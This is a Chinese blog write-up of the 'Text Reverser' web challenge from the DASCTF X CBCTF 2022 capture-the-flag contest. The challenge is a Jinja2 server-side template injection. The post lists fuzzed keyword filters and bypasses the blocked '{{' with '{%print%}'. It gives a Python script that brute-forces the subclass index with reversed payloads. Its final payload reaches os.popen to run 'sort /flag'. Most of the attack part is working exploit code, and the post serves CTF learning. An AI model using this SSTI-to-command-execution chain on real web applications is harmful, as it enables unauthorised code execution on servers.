DASCTF X CBCTF 2022九月挑战赛 Text Reverser

最新推荐文章于 2022-10-24 14:10:35 发布
最新推荐文章于 2022-10-24 14:10:35 发布
阅读量571 收藏
点赞数 1
文章标签: java servlet 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/126924370
版权

还是那句话:输入什么返回什么,猜测模板注入

Fuzz一波,看一下过滤情况

2

{{

200

false

false

547

12

request

200

false

false

547

13

print

200

false

false

547

18

class

200

false

false

547

20

base

200

false

false

547

21

session

200

false

false

547

30

flag

200

false

false

547

32

builtins

200

false

false

547

33

get_flashed_messages

200

false

false

547

35

subclasses

200

false

false

547

38

headers

200

false

false

547

{{被过滤了就用{%print%}的形式

发现是反序输出的。那就用脚本或者在线工具讲构造好的payload反序一下。

确立一个payload再跑一下变量的参数:

import requests

url = "http://f67aad23-ad37-4e9d-81a3-f6766254d354.node4.buuoj.cn:81/"
data = {"text": "=}%fidne%{1}%))(daer.)'/ sl'(]'nepop'[__slabolg__.__tini__.]711[)(__sessalcbus__.]0[__sesab__.__ssalc__.''(fi%{"}


for i in range(1, 1000):
    data["text"] = "=}%fidne%{1}%))(daer.)'/ sl'(]'nepop'[__slabolg__.__tini__.]"+str(i)+"[)(__sessalcbus__.]0[__sesab__.__ssalc__.''(fi%{"
    resp = requests.post(url=url, data=data)
    if "Output" in resp.text:
        print(i)

再用在线工具:文本翻转颠倒排序-在线文字倒序反转翻转排序工具

反序payload:

{%print(''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']("sort /flag").read())%}

直接贴payload:

text=}%))(daer.)"galf/ tros"(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.]0[__sesab__.__ssalc__.''(tnirp%{

清风--
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
DASCTF X CBCTF 2022九月挑战赛 cyberprinter wp
qq_65147345的博客
10-02 352
通过格式化字符串漏洞改写libc中strlen的got表地址为one_gadget
DASCTF X CBCTF 2022九月挑战赛
qq_62046696的博客
10-24 1223
总结:其实当时做的时候,也想到这些了比如第一道题,但是当时没有时间戳的概念,不知道在前端找check.php发包的,然后导致,没思路。说明其中有字符确认掉了,然后发现是{{我们可以用 {{% print % }}代替,now as a web service一个web服务,那么大概几率就是ssti了。抓了个包,100000000分肯定是改一些东西,发现了check.php。一般这种题目,要么是sql注入要么就是ssti模板注入。第二个ssti单纯是因为懒!这道题打开以后其实就是一个逆序的文本框,
DASCTF X CBCTF 2022九月挑战赛-Pwn
qq_34010404的博客
09-19 612
buf 后面跟着一个libc的地址,可以leak libc 的基址下面跟着一个格式串漏洞,puts里面调用的strlen,改那个got为one_gadget 即可(这个题刚好有一个满足的gadget)栈溢出,但是只能覆盖返回地址,栈迁移做就行UAF 可以改fd (加或减去一个偏移)
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1902
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
Scroll Reverser.app.zip
06-07
标题“Scroll Reverser.app.zip”表明这是一款适用于MacBook苹果系统的应用软件,其主要功能是解决用户在使用外部鼠标时遇到的滚动方向不一致的问题。这个应用的名称“Scroll Reverser”直接对应了它的核心功能,即...
Scroll Reverser鼠标滚轮修改
11-27
"Scroll Reverser"是一款专门解决这个问题的小型软件,它允许用户自定义鼠标的滚轮滚动方向,使其更符合个人使用习惯,尤其是对于从Windows系统切换到Mac的用户来说,这是一个非常实用的工具。 Scroll Reverser的...
StringReverser
05-12
标题中的"StringReverser"是一个程序或工具,它的主要功能是反转字符串。在计算机编程中,字符串反转是一个常见的操作,比如用户输入的文本、URL、密码等可能需要进行反向处理。这个项目可能是用Java语言编写的,...
Scroll Reverser.zip
09-22
总的来说,"Scroll Reverser.zip"文件提供的Scroll Reverser应用是Mac用户优化滚动体验的一个实用工具。它解决了不同操作系统滚动习惯之间的冲突,让用户可以根据自己的喜好自由定制滚动行为,提高了工作效率和舒适...
proxy-reverser
06-09
"proxy-reverser"是一个基于JavaScript的代理反向器工具,主要用于网络开发和测试环境,尤其是对于需要处理跨域请求限制的情况。代理反向器在Web开发中的作用是作为一个中间层,它接收客户端(通常是浏览器)的请求...
DASCTF X CBCTF 2022九月挑战赛 appetizer
qq_65147345的博客
10-04 304
1. 将rop链布置到end中,泄露出libc地址,通过最后一个read进行栈迁移 2. 在第一个链中输出完之后再执行一个read向end写入第二个rop链 3. 第二个rop链就是常规的open,read,puts了
DASCTF X CBCTF 2022九月挑战赛 Writeup
末初的CSDN博客
09-20 1466
DASCTF X CBCTF 2022九月挑战赛 Writeup
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 559
DASCTF X CBCTF 2022九月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛 学习记录
m0_64815693的博客
09-23 1912
学习记录
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 678
胡小楠的刷题日常
DASCTF X CBCTF 2022九月挑战赛WEB复盘
m0_61206225的博客
09-21 489
dino3d Text Reverser cbshop JavaMaster
DASCTF X CBCTF 2022九月挑战赛 bar wp
qq_65147345的博客
10-03 203
思路: 1. 通过漏洞改写fd打tcache attack
Text Reverse(字符串反转,文本逆置)
weixin_46447561的博客
06-07 1343
题目: Problem Description Ignatius likes to write words in reverse way. Given a single line of text which is written by Ignatius, you should reverse all the words and then output them. Input The input contains several test cases. The first line of the input
mina-example中的小例子(字符串反转)
只想靠两手,向理想挥手
04-21 172
1.首先请看服务端代码: [code="java"] package org.apache.mina.example.reverser; import java.net.InetSocketAddress; import java.nio.charset.Charset; import org.apache.mina.filter.codec.ProtocolCodecFilte...
atcodet160a reverser and count
最新发布
05-31
Sure, I'd be happy to help you with that problem! The problem statement for ATC160A Reverser and Count is as follows: You are given a 4-digit integer N. Write a program to reverse its digits and count the number of digits that are different from the original number. For example, if N is 1234, you should output 4, since all digits are different from the original number and the reversed number is 4321. To solve this problem, you can use the following steps: 1. Read in the integer N. 2. Convert N to a string so that you can easily reverse its digits. 3. Reverse the string representation of N. 4. Iterate through the original and reversed strings simultaneously and count the number of times the digits are different. 5. Output the count. Here's some Python code that implements this algorithm: ``` n = input() n_rev = n[::-1] count = 0 for i in range(len(n)): if n[i] != n_rev[i]: count += 1 print(count) ``` I hope this helps! Let me know if you have any further questions.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值